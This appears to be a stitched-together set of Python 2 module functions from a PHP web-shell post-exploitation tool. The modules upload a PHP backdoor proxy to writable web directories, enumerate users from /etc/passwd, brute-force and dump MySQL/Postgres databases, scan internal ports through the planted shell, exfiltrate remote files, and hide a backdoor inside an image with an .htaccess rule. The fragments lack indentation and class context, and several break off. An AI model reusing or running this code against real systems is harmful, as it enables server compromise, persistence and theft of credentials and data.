def run_module(self, rpath, finddir):
rname = ''.join(choice(letters) for i in xrange(4)) + '.php'
if not rpath and finddir:
path, url = self.__find_writable_dir(finddir)
if not (path and url):
raise ModuleException(
self.name,
'Writable dir in \'%s\' not found. Specify writable dir using \':net.php_proxy rpath=writable_dir/proxy.php\''
% finddir)
else:
path = path + rname
url = url + rname
else:
if not rpath.endswith('.php'):
raise ModuleException(
self.name, 'Remote PHP path must ends with \'.php\'')
path = rpath
url = None
if path:
phpfile = self.__get_backdoor()
response = self.__upload_file_content(phpfile, path)
if response:
if url:
self.mprint(
'[%s] PHP proxy script uploaded. Go with your browser to %s?u=http://www.google.com\''
% (self.name, url))
else:
self.mprint(
'[%s] PHP proxy script uploaded. Go with your browser to script URL followed by ?u=http://www.google.com\''
% (self.name))
self.mprint(
'[%s] When finished remove \'%s\' and \'ses_*\' files created in the same folder'
% (self.name, path))
return
raise ModuleException(
self.name,
"Error installing remote PHP proxy, check uploading path")
def __prepare_payload(self, vector, parameters, payloadnum=0):
if vector.payloads[payloadnum].count('%s') == len(parameters):
return vector.payloads[payloadnum] % tuple(parameters)
else:
raise ModuleException(
self.name,
"Error payload parameter number does not corresponds")
def run_module( self, filename, host, port):
wl_splitted = []
if filename != 'auto':
try:
wordlist = open(filename, 'r')
wl_splitted = [ w.strip() for w in wordlist.read().split() ]
except Exception, e:
raise ModuleException(self.name, "Error opening %s: %s" % (filename, str(e)))
def run_module( self, local_path, remote_path):
if not self.file_content:
try:
local_file = open(local_path, 'r')
except Exception, e:
raise ModuleException(self.name, "Open file '%s' failed" % (local_path))
file_content = local_file.read()
def run_module(self, local_path, remote_path, chunksize):
if self.modhandler.load('file.check').run({
'rpath': remote_path,
'mode': 'exists'
}):
raise ModuleException(
self.name,
"Remote file already exists, delete it with \':file.rm %s\'" %
(remote_path))
if not self.file_content:
try:
local_file = open(local_path, 'r')
except Exception, e:
raise ModuleException(self.name,
"Open file '%s' failed" % (local_path))
file_content = local_file.read()
def __get_backdoor(self):
backdoor_path = self.modhandler.path_modules + '/net/external/phpproxy.php'
try:
f = open(backdoor_path)
except IOError:
raise ModuleException(self.name, "'%s' not found" % backdoor_path)
return f.read()
def run_module(self, filter_real_users):
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(
self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_payload(vector, [filter_real_users])
if response != None:
return response
raise ModuleException(self.name, "Users enumeration failed")
def run_module( self, mode, user, pwd , db, table, host ):
if mode != 'mysql':
raise ModuleException(self.name, "Only 'mysql' database is supported so far")
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells + [ 'sql.query' ])
for vector in vectors:
response = self.__execute_payload(vector, [mode, host, user, pwd, db, table])
if response != None:
self.params.set_and_check_parameters({'vector' : vector.name})
return response
def run_module(self, list_path, printall):
if not self.pathdict and list_path:
try:
list = open(os.path.expanduser(list_path),
'r').read().splitlines()
self.set_list(list)
except:
raise ModuleException(
self.name, "Error opening path list \'%s\'" % list_path)
else:
list = self.pathdict.keys()
self.mprint('[%s] Enumerating %i paths' % (self.name, len(list)))
for path in list:
output = path + '' + '\t' * (3 - ((len(path) + 1) / 8))
if self.modhandler.load('file.check').run({
'rpath': path,
'mode': 'exists'
}):
output += '\texists'
self.pathdict[path][0] = 1
if self.modhandler.load('file.check').run({
'rpath': path,
'mode': 'r'
}):
self.pathdict[path][1] = 1
output += ', +readable'
if self.modhandler.load('file.check').run({
'rpath': path,
'mode': 'w'
}):
self.pathdict[path][2] = 1
output += ', +writable'
if self.modhandler.load('file.check').run({
'rpath': path,
'mode': 'x'
}):
self.pathdict[path][3] = 1
output += ', +excutable'
self.mprint(output)
elif printall:
self.mprint(output)
def __process_response(self,response, remote_path, local_path):
if self.vector.name == 'copy' or self.vector.name == 'symlink':
if not self.file_path.endswith('.html') and not self.file_path.endswith('.htm'):
self.mprint("[%s] Warning, method '%s' use HTTP file download. Assure that remote file\n[%s] has a downloadable extension like 'html', or use another vector" % (self.name, self.vector.name, self.name))
if self.modhandler.load('file.check').run({'rpath' : self.file_path, 'mode': 'exists'}):
response = Request(self.url).read()
if self.modhandler.load('shell.php').run({0: "unlink('%s') && print('1');" % self.file_path}) != '1':
self.mprint("[!] [%s] Error cleaning support file %s" % (self.name, self.file_path))
else:
self.mprint("[!] [%s] Error checking existance of %s" % (self.name, self.file_path))
else:
if self.encoder_callable:
try:
response = b64decode(response)
except TypeError:
self.mprint("[!] [%s] Error, unexpected file content" % (self.name))
if response:
try:
f = open(local_path,'wb')
f.write(response)
f.close()
except Exception, e:
self.mprint('[!] [%s] Some error occurred writing local file \'%s\'.' % (self.name, local_path))
raise ModuleException(self.name, e)
response_md5 = md5(response).hexdigest()
remote_md5 = self.modhandler.load('file.check').run({'rpath' : remote_path, 'mode' : 'md5'})
if not remote_md5:
self.mprint('[!] [%s] MD5 hash method is not callable with \'%s\', check disabled' % (self.name, remote_path))
return response
elif not remote_md5 == response_md5:
self.mprint('[%s] MD5 hash of \'%s\' file mismatch, file corrupted' % (self.name, local_path))
else:
self.mprint('[%s] File correctly downloaded to \'%s\'.' % (self.name, local_path))
return response
def run_module(self, type, path):
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_payload(vector, [type, path])
if response != None:
self.params.set_and_check_parameters({'vector' : vector.name})
return response
raise ModuleException(self.name, "Files not found")
def run_module(self, url, home, depth_limit):
confine_prefix = url
exclude = ''
if home[-1] != '/': home = home + '/'
self.mprint('[%s] Crawling paths in %s (depth %i)' % (self.name, url, depth_limit))
try:
crawler = Crawler(url, depth_limit, confine_prefix, exclude)
crawler.crawl()
except Exception, e:
raise ModuleException(self.name, "Crawler exception: %s" % str(e))
def _probe(self):
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(
self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_probe(vector)
if response:
self.payload = vector.payloads[0]
return
raise ModuleException("shell.sh",
"Shell interpreter initialization failed")
def __process_response(self, response, remote_path, local_path):
if self.vector.name == 'copy' or self.vector.name == 'symlink':
if not self.file_path.endswith('.html') and not self.file_path.endswith('.htm'):
self.mprint("[%s] Warning: vector '%s' works better with files with downloadable extension like '.html'" % (self.name, self.vector.name))
if self.modhandler.load('file.check').run({'rpath' : self.file_path, 'mode': 'exists'}):
response = Request(self.url).read()
else:
response = None
# Force deleting. Does not check existance, because broken links returns False
self.modhandler.load('file.rm').run({'rpath' : self.file_path, 'recursive': False})
else:
if self.encoder_callable:
try:
response = b64decode(response)
except TypeError:
self.mprint("[!] [%s] Error, unexpected file content" % (self.name))
if response:
try:
f = open(local_path,'wb')
f.write(response)
f.close()
except Exception, e:
self.mprint('[!] [%s] Some error occurred writing local file \'%s\'.' % (self.name, local_path))
raise ModuleException(self.name, e)
response_md5 = md5(response).hexdigest()
remote_md5 = self.modhandler.load('file.check').run({'rpath' : remote_path, 'mode' : 'md5'})
if not remote_md5:
self.mprint('[!] [%s] MD5 hash method is not callable with \'%s\', check disabled' % (self.name, remote_path))
return response
elif not remote_md5 == response_md5:
self.mprint('[%s] MD5 hash of \'%s\' file mismatch, file corrupted' % (self.name, local_path))
else:
self.mprint('[%s] File correctly downloaded to \'%s\'.' % (self.name, local_path))
return response
def run_module(self, remote_path):
file = NamedTemporaryFile()
file.close()
# Passing vector to file.download
self.modhandler.load('file.download').params.set_and_check_parameters({'vector':self.params.get_parameter_value('vector')})
self.modhandler.set_verbosity(2)
self.modhandler.load('file.download').run({'rpath' : remote_path, 'lpath' : file.name})
self.modhandler.set_verbosity()
response = self.modhandler.load('file.download').get_last_read_file()
if response and path.exists(file.name):
remove(file.name)
return response
raise ModuleException(self.name, "File read failed")
def run_module(self, auto, list, path):
custom_files = []
if list != None:
try:
custom_files = open(list, 'r').read().splitlines()
except:
raise ModuleException(self.name,
"Error opening path list \'%s\'" % list)
elif path != None:
custom_files = path.split(',')
elif auto:
if auto == 'any':
custom_files = self.common_files['home'] + self.common_files[
'web']
else:
custom_files = self.common_files[auto]
else:
print '[!] Error, required one of this parameters: %s' % (
self.params.summary())
return
self.modhandler.set_verbosity(2)
self.modhandler.load('audit.etc_passwd').run({'filter': 'True'})
self.modhandler.set_verbosity()
path_list = []
user_dict = self.modhandler.load('audit.etc_passwd').usersinfo
self.mprint('[%s] Enumerating %i users' %
(self.name, len(user_dict.keys())))
for username in user_dict:
for f in custom_files:
path_list.append(user_dict[username].home + '/' + f)
if path_list:
self.modhandler.load('file.enum').set_list(path_list)
self.modhandler.load('file.enum').run({'lpath': ''})
def _probe(self):
for currentmode in self.modes:
rand = str(random.randint( 11111, 99999 ))
self.current_mode = currentmode
if self.run_module('echo %s;' % (rand)) == rand:
self.params.set_and_check_parameters({'mode' : currentmode}, False)
break
if not self.current_mode:
raise ModuleException(self.name, "PHP interpreter initialization failed")
else:
if self.run_module('is_callable("is_dir") && is_callable("chdir") && is_callable("getcwd") && print(1);') != '1':
self.mprint('[!] Error testing directory change methods, \'cd\' and \'ls\' will not work.')
else:
self.cwd_vector = "chdir('%s'); %s"
def run_module(self, addr, port, onlyknownports, portsperreq):
port_list_path = None
if onlyknownports:
port_list_path = 'modules/net/external/nmap-services-tcp'
self.reqlist = RequestList(self.modhandler, port_list_path)
self.reqlist.add(addr, port)
if not self.reqlist:
raise ModuleException(self.name,
'Invalid scan range, check hosts and ports')
hostnum = len(self.reqlist)
portnum = len(self.reqlist.port_list)
reqnum = (portnum * hostnum / portsperreq) + 1
self.mprint(
'[%s] Scanning %i ports of %i hosts using %i requests (%i connections per request)'
% (self.name, portnum, hostnum, reqnum, portsperreq))
if onlyknownports:
known_ports_string = '[%s] Only known ports scanned.' % self.name
while self.reqlist:
reqstringarray = ''
requests = self.reqlist.get_requests(portsperreq)
for host, ports in requests.items():
reqstringarray += '%s %s,' % (host, '|'.join(map(str,
(ports))))
reqstringarray = '%s' % reqstringarray[:-1]
payload = self.vector_scan % (self.rand_post_addr)
self.modhandler.load('shell.php').set_post_data(
{self.rand_post_addr: b64encode(reqstringarray)})
response = self.modhandler.load('shell.php').run({0: payload})
print response
def run_module(self, remote_path, local_path):
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_payload(vector, [remote_path, local_path])
if response != None:
file_response = self.__process_response(response, remote_path, local_path)
self.params.set_and_check_parameters({'vector' : self.vector.name})
self.lastreadfile = file_response
return
raise ModuleException(self.name, "File read failed")
def run_module(self, rpath, recursive):
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(
self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_payload(vector, [rpath, recursive])
if 'OK' in response:
self.params.set_and_check_parameters({'vector': vector.name})
return True
recursive_output = ''
if not recursive:
recursive_output = ' and use \'recursive\' with unempty folders'
raise ModuleException(
self.name, "Delete fail, check existance and permissions%s." %
(recursive_output))
def run_module( self, mode, user, filename, start_line, host):
if start_line == 'all':
start_line = 0
if 'localhost' not in host and '127.0.0.1' not in host:
self.chunksize = 20
if self.substitutive_wl:
wl_splitted = self.substitutive_wl[:]
self.substitutive_wl = []
else:
try:
wordlist = open(filename, 'r')
except Exception, e:
raise ModuleException(self.name, "%s" % (str(e)))
wl_splitted = [ w.strip() for w in wordlist.read().split() ]
def run_module( self, mode, user, pwd, query, host):
if mode == 'mysql':
sql_connect = "mysql_connect"
sql_query = "mysql_query"
sql_fetch = "mysql_fetch_row"
elif mode == 'postgres':
sql_connect = "pg_connect"
sql_query = "pg_query"
sql_fetch = "pg_fetch_row"
else:
raise ModuleException(self.name, "Database '%s' unsupported" % (mode))
vectors = self._get_default_vector2()
if not vectors:
vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells)
for vector in vectors:
response = self.__execute_payload(vector, [sql_connect, sql_query, sql_fetch, host, user, pwd, query])
if response != None:
self.params.set_and_check_parameters({'vector' : vector.name})
return response
def run_module(self):
ifconfig = self.__find_ifconfig_path()
try:
response = self.modhandler.load('shell.sh').run({ 0 : ifconfig})
except ModuleException:
response = None
if response:
ifaces = re.findall(r'^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', response, re.S | re.M)
if ifaces:
for i in ifaces:
ipnet = IPNetwork('%s/%s' % (i[1], i[2]))
self.ifaces[i[0]] = ipnet
self.mprint('%s: %s' % (i[0], ipnet))
else:
raise ModuleException(self.name, "No interfaces infos found")
def __init__(self, modhandler, port_list_path):
self.modhandler = modhandler
self.port_list = []
self.ifaces = {}
self.nmap_ports = []
self.nmap_services = {}
if port_list_path:
try:
nmap_file = open(port_list_path, 'r')
except:
raise ModuleException(
self.name,
'Error opening \'%s\' port file' % port_list_path)
for line in nmap_file.readlines():
name, port = line[:-1].split()
self.nmap_services[int(port)] = name
self.nmap_ports.append(int(port))
dict.__init__(self)
writable_dirs = self.__enumerate_writable_dirs(start_path)
for dir_path in writable_dirs:
if not dir_path[-1] == '/':
dir_path += '/'
file_path = dir_path + self.probe_filename
file_url = http_root + file_path.replace(start_path, '')
dir_url = http_root + dir_path.replace(start_path, '')
if self.__upload_file_content(
'1', file_path) and self.__check_remote_test_file(
file_path) and self.__check_remote_test_url(
file_url):
self.dir = dir_path
self.url = dir_url
self.__remove_remote_test_file(file_path)
if self.dir and self.url:
self.mprint(
"[find.webdir] Found writable web dir %s -> %s" %
(self.dir, self.url))
return True
raise ModuleException(self.name, "Writable web directory not found")
except Exception, e:
raise ModuleException(self.name, str(e))
test_output = getoutput('php %s' % output_img_test)
unlink(output_img_test)
if 'TEST OK' in test_output:
try:
out = file(output_img, 'w')
out.write(
'%s%s' %
(input_img_data, str(self.backdoor).replace('\n', ' ')))
out.close()
except Exception, e:
raise ModuleException(self.name, str(e))
else:
raise ModuleException(
self.name,
'[%s] Error testing backdoor in image \'%s\'. Choose simpler image as an empty gif file'
% (self.name, output_img_test))
try:
hout = file(output_htaccess, 'wt')
hout.write(self.htaccess_template % input_img_ext)
hout.close()
except Exception, e:
raise ModuleException(self.name, str(e))
